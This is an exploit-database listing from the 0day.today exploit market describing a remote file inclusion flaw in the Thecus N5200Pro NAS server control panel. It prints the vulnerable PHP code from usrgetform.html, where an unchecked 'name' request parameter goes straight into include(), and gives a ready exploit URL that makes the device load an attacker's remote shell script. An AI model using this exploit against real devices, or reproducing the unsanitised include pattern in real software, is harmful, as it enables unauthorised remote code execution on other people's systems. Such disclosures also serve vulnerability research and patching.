[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Thecus N5200Pro NAS Server Control Panel RFI Vulnerability

Author
Crackers_Child
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9146
Category
remote exploits
Date add
18-02-2008
Platform
hardware
==========================================================
Thecus N5200Pro NAS Server Control Panel RFI Vulnerability
==========================================================

Thecus N5200Pro NAS Server Control Panel Remote File Include


Author : Crackers_Child

Mail   : cashr00t@hotmail.com

Bug in : usrgetform.html


<?php
    $htm=$_REQUEST['name'];
    require_once("/img/htdocs/webconfig");
    require_once("/img/www/inc/function.php");
    get_sysconf();
    $version=trim(shell_exec("/bin/cat /img/version"));
    $model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: \'/CPUFLAG/{printf("%s", $2)}\''));
    if($model=="1"){
      $model_name=$webconfig['product_no'].$webconfig['pro'];
    }else{
      $model_name=$webconfig['product_no'];
    }
    if (!$htm){
        print 'no name given';
        exit;
    }
    if ($htm=='lang') $htm='../pub/lang';
    session_start();
    header('Content-type: text/html;charset=utf-8');
    $lang='en';
    if (isset($_SESSION['lang'])){$lang=$_SESSION['lang'];};
    ob_start();
    include("$htm.htm");
    $html=ob_get_contents();
    ob_end_clean();

    include_once('header.html');
?>



Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?

Info : http://www.thecus.com/products_over.php?cid=11&pid=8

Greetz: Str0ke


#  0day.today [2024-12-24]  #